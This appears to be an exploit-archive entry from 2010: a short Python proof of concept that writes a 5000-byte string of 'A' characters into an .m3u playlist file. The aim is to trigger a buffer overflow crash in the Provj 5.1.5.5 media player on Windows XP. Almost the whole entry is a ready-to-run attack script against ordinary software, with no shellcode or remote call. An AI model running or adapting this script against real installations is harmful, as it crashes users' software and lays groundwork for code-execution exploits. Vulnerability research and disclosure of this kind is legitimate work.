id: 15003
date: 12/01/2010
title: Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC
author: 0v3r
cves: 

=====================================================
Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC
=====================================================

# Author: 0v3r
# Software Link: http://www.clubdjpro.com/files/provj5.exe
# Version: 5.1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A
 
 
#!/usr/bin/python
 
buff = "\x41" * 5000
 
try:
    f = open("exploit.m3u",'w')
    f.write(buff)
    f.close()
    print "[-] File created!\n"
except:
    print "[-] Error occured!\n"



#  0day.today [2023-03-24]  #